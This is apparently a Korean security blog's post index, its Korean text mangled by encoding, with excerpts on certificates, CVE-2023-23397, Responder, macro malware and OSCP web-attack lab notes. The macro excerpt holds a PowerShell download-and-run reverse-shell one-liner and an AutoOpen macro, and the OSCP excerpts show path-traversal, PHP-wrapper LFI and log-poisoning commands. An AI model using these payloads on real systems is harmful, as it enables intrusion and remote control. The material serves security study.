728x90 ์ ์ฒด ๊ธ739 java.security.cert.certpathvalidatorexception trust anchor for certification ์๋ฌ ISRG Root X1 ํน์ธ ISRG Root X2 .pem ํ์ผ ์ค์นhttps://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org์ถ์ฒ: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13. ๋ชจ๋ ์ธ์ฝ๋ฉ ๋์ฝ๋ฉ ๋ฌธ์ ํ์ธ ์ฌ์ดํธ(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5. ๋ธ๋๋ฒ ๋ฆฌ - bar ์ค์น ๊ด๋ จ ๋งํฌ BAR ํ์ผ ์ค์น ํ๋ก๊ทธ๋จhttps://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com ํฐ๋ฏธ๋ ์ฑ(term-48) ์์นด์ด๋ธ ์ฃผ์https://archive.org/details/term-48_bb10 2025. 7. 30. ์ทจ์ฝ์ ๋ถ์ - CVE-2023-23397 CVE-2023-23397 ์ทจ์ฝ์ ์ ๋ณดCVE-2023-23397๋ Microsoft Windows ์ ์ฉ Outlook์ ์ฝ์์ ์๋ ค์ฃผ๋ ‘๋ฏธ๋ฆฌ ์๋ฆผ’ ๊ธฐ๋ฅ์ ์ฌ์ํ ์ฌ์ด๋ ํ์ผ์ ๋ถ๋ฌ์ค๊ธฐ ์ํด์ ๊ณต๊ฒฉ์์ SMB ์๋ฒ๋ก ์ธ์ฆํ๋ ๊ณผ์ ์ NTLM ์๊ฒฉ ์ฆ๋ช ์ ํ์ทจ๋๋ ๊ถํ ์์น ์ทจ์ฝ์ ์ ๋๋ค.ํด๋น ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ๊ถํ ์์น์ด ์ด๋ฃจ์ด์ ธ ๋ ํฐ ํผํด๊ฐ ๋ฐ์ํ ์ ์์ ์ ๋๋ก ์ํ๋๋ ๋ค์ ๋์ ๊ฒ์ผ๋ก ์์๋ฉ๋๋ค.์กฐ์น ๋ฐฉ์์ผ๋ก Outlook์ Build 16130.20306 ์ด์์ผ๋ก ์ ๋ฐ์ดํธ๊ฐ ํ์ํ๋ฉฐ, SMB ์๋น์ค๋ฅผ ์ด์ฉํ์ง ์์ ๊ฒฝ์ฐ์๋ ํด๋น ์๋น์ค๋ฅผ ๋นํ์ฑํ ํ๊ฑฐ๋ SMB TCP/445 ํฌํธ ์์๋ฐ์ด๋๋ฅผ ์ฐจ๋จํฉ๋๋ค.CVE Number CVE-2023-23397CVSS Score9.8severity(์ฌ๊ฐ๋).. 2025. 7. 27. ์ทจ์ฝ์ ๋ถ์ - NTLM ํฌ๋ฆฌ๋ด์ ํจํท ์ค๋ํผ (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com ์ฌ์ฉ ์์... 2025. 7. 27. ์ ์ฑ์ฝ๋ ๋ถ์ - ๋งคํฌ๋ก ๋ฌธ์ ์ ์ฑ ํ์ผ IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')์ฒญํฌํ(๋ฌธ์์ด์ด ๋๋ฌด ๊ธธ๋ฉด ์ค๋ฅ๊ฐ ๋ฐ์) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26. OSCP - 9.3.2. Using Non-Executable Files ํ์ผ ์ ๋ก๋ ์ ์คํ์ด ๋ถ๊ฐ๋ฅํ ๊ฒฝ์ฐ(e.g. ์คํ ๊ถํ์ด ์๋ ์ ๋ก๋ ํด๋)์ ์ฌ์ฉํ ์ ์๋ ์ทจ์ฝ์ ๋ถ์ ๋ฐฉ๋ฒ์ ์์๋ณธ๋ค. ์ฐ์ ํ์ผ ์ ๋ก๋ ์ filename์ ๋งค๊ฐ๋ณ์๋ฅผ ์กฐ์ํ์ฌ ../../../../../../../test.txt๋ฅผ ๋ฃ์ด ์๋ฒ๋ก ์ ๋ฌํ ๊ฒฝ์ฐ ์๋ฒ ์ธก์ด ์ ์ ์๋ต์ ํ ๊ฒฝ์ฐ ์ทจ์ฝ ๊ฐ๋ฅ์ฑ์ด ์์ ์ ์๋ค. ํนํ ์ฌ๊ธฐ์ ๋ฃจํธ(/) ๊ฒฝ๋ก์์๋ ์ ์ ์ ๋ก๋ ๋ ๊ฒ์ด๋ผ๋ฉด root์ ํ๋๋ ํฐ๋ฆฌ๋ ์ง์ ์ ๊ทผ์ด ๊ฐ๋ฅํจ์ ์ ์ ์๋ค. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22. OSCP - 9.2.2. PHP Wrappers admin.php ํ์ผ ๋ด์ฉkali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. ๋ค์๊ณผ ๊ฐ์ด LFI๊ฐ ๋ฐ์ํ๋ ๊ฒฝ์ฐ(์ ๋ ฅ ๊ฒ์ฆ ์์ด ๋ฐ๋ก include ์คํ => include $_GET["page"];)PHP Wrappers์ ์ทจ์ฝํ ์ ์๋ค. admin.php ํ์ด์ง base64 ์ธ์ฝ๋ฉ(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21. OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) ๋ฐ access.log ํฌ์ด์ฆ๋ ์ทจ์ฝ์ access.log ํฌ์ด์ฆ๋(์ค์ผ)User-Agent ํค๋์ ํ์ค ์ง๋ฆฌ ์น์ ์ฝ๋๋ฅผ ๋ฃ๋๋ค. ์ดํ ์๋ฒ๋ก ๋ถํฐ ์์ฒญ์ด ๊ฐ๊ฒ ๋๋ฉด ์๋ฒ ์ธก์ ์ํ์น ๋ก๊ทธ ํ์ผ์ธ /var/log/apache2/access.log(์๋์ฐ ์์: C:\xampp\apache\logs\access.log)์๋ ์ฌ์ฉ์์ ๋ฐฉ๋ฌธ ์ ๋ณด(์์ดํผ ์ฃผ์, ๊ฒฝ๋ก, User-Agent)๊ฐ ๋จ๊ฒ ๋๋ค. ์ด์ LFI ์ทจ์ฝ์ ์ด ์๋ ํ๋ผ๋ฏธํฐ์๋ค /var/log/apache2/access.log๋ฅผ ์ ๋ ฅ์ ํด ํ์ผ์ ์ฝ์ด ์ค๊ฒ ๋๋ฉด์ ํด๋น PHP ์ฝ๋๊ฐ ์คํ๋๋ฉด์ ์๊ฒฉ ์ฝ๋ ์คํ ์ทจ์ฝ์ด ๋ฐ์ํ๋ค. (*cmd ํ๋ผ๋ฏธํฐ ์์๋ ?๊ฐ ์๋ &์ด ์ฌ ๊ฒ) nc -nvlp 4444์ข ๋ ์ํํ ์ ์ด๋ฅผ ์ํ ๊ฒฝ์ฐ ๊ณต๊ฒฉ์๋ ๋ฆฌ๋ฒ์ค์์ ์ด์ด ๋์ ์๋ฒ๊ฐ ์ฐ๊ฒฐ์.. 2025. 7. 21. OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is ์ทจ์ฝ์ ๊ฐ์Grafana 8.x ๋ฒ์ ์์ ๋ฐ์ ํ๋ Path Traversal ์ทจ์ฝ์ ์ด๋ค. ํ๋ฌ๊ทธ์ธ API ์๋ํฌ์ธํธ์ ๊ฒฝ๋ก์ ๋ํ ์ฌ์ฉ์ ์ ๋ ฅ์ ๋ํ ๊ฒ์ฆ์ด ๋ฏธํกํ์ฌ ์๋น์ค ์์ญ ์ธ์ ์์ ๋๋ ํฐ๋ฆฌ ๋ฑ์ ์ก์ธ์ค๊ฐ ๊ฐ๋ฅํ๊ฒ ๋๋ค. ๋ฌธ์ ์ ์ฝ๋ : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 ์ฐธ๊ณ https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21. ์์คํ ๋ณด์ - ํด์(MD5, SHA1, SHA256) ํ์ธ ์ฌ์ดํธ ๋ชจ์ ํด์ ์๋ณ https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt them, click this link instead. Decrypt Hasheshashes.com ํด์ ๋ณตํธํ https://hashes.com/en/decrypt/hash Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256.. 2025. 7. 18. Oracle DB - ์ฌ์ฉ์ ๊ถํ ๋ฐ ํ ์ด๋ธ ํ์ธ ์ฟผ๋ฆฌ๋ฌธ --ํ์ฌ ์ฌ์ฉ์ ํ์ธ SQL: SELECT USER FROM DUAL;-- ์ธ์ ์ฌ์ฉ์ ํ์ธ:SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM DUAL;-- ๊ถํ ํ์ธ:SELECT * FROM SESSION_PRIVS;-- DBA ์ฌ๋ถ ํ์ธ:SELECT * FROM USER_ROLE_PRIVS;-- ํ ์ด๋ธ ๋ชฉ๋ก ํ์ธSELECT table_name FROM user_tables; 2025. 7. 17. ์ด์ 1 2 3 4 ยทยทยท 62 ๋ค์ 728x90